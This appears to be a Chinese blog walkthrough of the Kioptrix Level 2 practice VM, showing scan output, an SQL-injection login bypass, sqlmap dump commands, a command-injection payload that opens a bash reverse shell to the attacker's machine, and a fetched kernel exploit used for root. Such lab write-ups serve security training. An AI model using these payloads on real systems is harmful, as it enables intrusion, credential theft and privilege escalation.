Kioptrix_Level_2-update

一、信息收集

1.主機(jī)發(fā)現(xiàn)sudo arp-scan -l,識(shí)別到靶機(jī)IP為192.168.65.135
2.nmap掃描端口及版本nmap -T4 -A -v 192.168.65.135,結(jié)果如下
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            854/udp   status
|_  100024  1            857/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2021-03-15T03:48:40+00:00; -3h09m38s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
3.nikto目錄掃描nikto -host http://192.168.65.135/ 
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 - STATUS: Completed 270 requests (~4% complete, 9.0 minutes left): currently in plugin 'Site Files'
- STATUS: Running average: 100 requests: 0.10283 sec, 10 requests: 0.1128 sec.
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2021-03-15 03:34:03 (GMT-4) (61 seconds)
4.訪(fǎng)問(wèn)80端口及掃描出來(lái)的路徑

二、漏洞發(fā)現(xiàn)

1.http://192.168.65.135/index.php處存在sql注入
(1)burpsuitez抓包Fuzz驗(yàn)證
(2)使用username=admin,password='or' 1=1--成功進(jìn)入
(3)sqlmap脫褲(這下面的沒(méi)啥用,當(dāng)練習(xí)sqlmap了,不感興趣可以跳過(guò)這一步)
  • sqlmap -r 12.txt --dbs --level 3 --risk 2 --batch
  • sqlmap -r 12.txt -D webapp --tables --level 3 --risk 2
  • sqlmap -r 12.txt -D webapp -T users --columns --level 3 --risk 2
  • sqlmap -r 12.txt -D webapp -T users -C username,password --dump --level 3 --risk 2
2.命令執(zhí)行漏洞
(1)127.0.0.1|ls
(2)kali監(jiān)聽(tīng)端口nc -lvvp 1234,反彈shell127.0.0.1|bash -i >& /dev/tcp/192.168.65.129/1234 0>&1

(3)查詢(xún)系統(tǒng)版本umane -a
(4)查找漏洞庫(kù),找到內(nèi)核版本漏洞https://www.exploit-db.com/exploits/9542
(5)下載9542.c,再讓靶機(jī)下載
  • 先下載放在kali
  • 然后開(kāi)啟http服務(wù)python -m SimpleHTTPServer 9090

  • 在剛剛反彈的shell上下載下來(lái)wget http://192.168.65.129:9090/9542/9542.c

  • 然后編譯gcc 9542.c,編譯完成后,執(zhí)行編譯出來(lái)的文件./a.out,然后提權(quán)成功

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容